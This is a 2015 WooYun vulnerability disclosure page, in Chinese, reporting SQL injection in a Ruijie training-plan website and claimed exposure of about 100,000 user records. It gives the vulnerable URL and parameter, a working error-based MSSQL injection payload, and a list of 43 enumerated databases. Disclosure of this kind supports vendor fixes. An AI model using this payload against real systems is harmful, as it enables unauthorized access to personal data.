当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131777

漏洞标题:锐捷大学出现SQL注入约10万条用户信息泄露

相关厂商:ruijie.com.cn

漏洞作者: 深挖洞

提交时间:2015-08-07 11:42

修复时间:2015-09-21 12:00

公开时间:2015-09-21 12:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-07: 细节已通知厂商并且等待厂商处理中
2015-08-07: 厂商已经确认,细节仅向厂商公开
2015-08-17: 细节向核心白帽子及相关领域专家公开
2015-08-27: 细节向普通白帽子公开
2015-09-06: 细节向实习白帽子公开
2015-09-21: 细节向公众公开

简要描述:

参数过滤不严,导致信息可以被泄露。忘记贴地址。

详细说明:

锐捷大学培训计划

QQ截图20150805110027.png


提交字符"')\出现异常

QQ截图20150805110118.png

漏洞证明:

统计下有多少信息没有脱库
用户信息10W条

QQ截图20150805110205.png


锐捷证书验证2W条

QQ截图20150805110236.png


管理员13条

QQ截图20150805111456.png


URL:http://university.ruijie.com.cn//train/trainningplan.aspx?area=%E9%95%BF%E6%B2%99&eDate=01/01/1967&page=1&sDate=01/01/1967&type=1&xy=7%27%27%29\

Parameter: xy (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: area=%E9%95%BF%E6%B2%99&eDate=01/01/1967&page=1&sDate=01/01/1967&type=1&xy=7)) AND 2653=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2653=2653) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(122)+CHAR(113))) AND ((2048=2048
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET, Nginx
back-end DBMS: Microsoft SQL Server 2008
available databases [43]:
[*] DocManage
[*] ec0002-log
[*] ec0033
[*] ec0034
[*] ec0035
[*] ec0038
[*] eg0002
[*] ELabClub
[*] ELabClub_BBS
[*] FileStorage
[*] ic0039
[*] ig0058
[*] ig0061
[*] ig0063
[*] ig0064
[*] master
[*] model
[*] msdb
[*] PTEDM0415
[*] PTEDM_jy
[*] PTEDM_QD
[*] RJSite
[*] RJSite-CN
[*] RJSite_APP
[*] RJSite_CN_2013
[*] RJSite_ZLK
[*] rtx2011
[*] RuijieIOUManagement
[*] RuiJieOMMS
[*] RuiJieOMMS_WorkflowService
[*] SharePoint_AdminContent_5a480099-abda-4e59-9643-175519f963c0
[*] SharePoint_Config
[*] sibgl
[*] sibgl_gjyw
[*] SWorkflow
[*] tempdb
[*] WEBCNTD
[*] WebCollege2012
[*] WebCollege_journal
[*] WebCollege_journal_BASE
[*] WSS_Content_a6d51dfa1a6a496481bbd0fc3b73901a
[*] WSS_Search_MOSSWEB
[*] zzsfxzygjgx


修复方案:

版权声明:转载请注明来源 深挖洞@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-08-07 11:59

厂商回复:

确认中

最新状态:

暂无